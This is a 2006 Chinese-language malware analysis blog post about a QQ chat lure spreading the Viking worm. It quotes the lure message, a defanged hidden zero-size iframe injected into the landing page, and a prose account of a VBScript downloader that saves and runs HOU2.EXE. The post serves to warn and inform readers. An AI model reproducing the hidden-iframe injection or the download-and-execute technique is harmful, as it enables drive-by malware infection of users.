传播维金/Viking蠕虫的QQ尾巴变花样了

endurer　原创

2006-09-03　第1版

小心通过QQ尾巴中的网址（Q-Zone.****qq.C0M）传播的Worm.Win32.Viking.r

一文中的网址变了。打开QQ好友的对话框就会自动发出的信息为：
/----------
我有个女同学参加2006,大学生网络风采评选,Q-Zone空间上有她参选照片,帮忙游览下给他增加人气,谢谢……

hxxp://Q-Zone.QQ***.C0M.%37***%76%***34%2E%63%6E/Q-zone/Cgi_bin/Entry-Cgiuin=**98393212
----------/

该网页首部中有：
/----------
＜iframe src=hxxp://web****2.%33%39%63***%6F%6D%***2E%6F%72%67/ms/mm.htm width=0 height=0＞＜/iframe＞
----------／

hxxp://web****2.%33%39%63***%6F%6D%***2E%6F%72%67/ms/mm.htm中有 protected by HTMLShip XP(Unregistered Version) 的脚本代码，脚本程序共有3部分（原来脚本程序共有2部分）。

第1、2部分脚本程序　使用的是JavaScript，其功能是阻止用户选择网页内容、屏蔽右键关键菜单等，以及第二部分脚本程序正确运行所需要的数据。

第3部分脚本程序　使用的是VBScript，其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把某个网站（这里不给出网址了）的MS目录中的文件 HOU2.EXE （原来下载的是 HOU1.EXE）保存为 IE临时文件夹中的 g0ld.com，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

Kaspersky 将 HOU2.EXE 报为 Worm.Win32.Viking.r。

网页中部同样为加密的脚本代码，脚本解密后为：
/----------
＜iframe width="760" height="1830" src="hxxp://u.***7town.com/html/760_1830/ly1/index.html?uid=15407&a=&b=&c=&d=&e=&f=" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"＞＜/iframe＞
----------／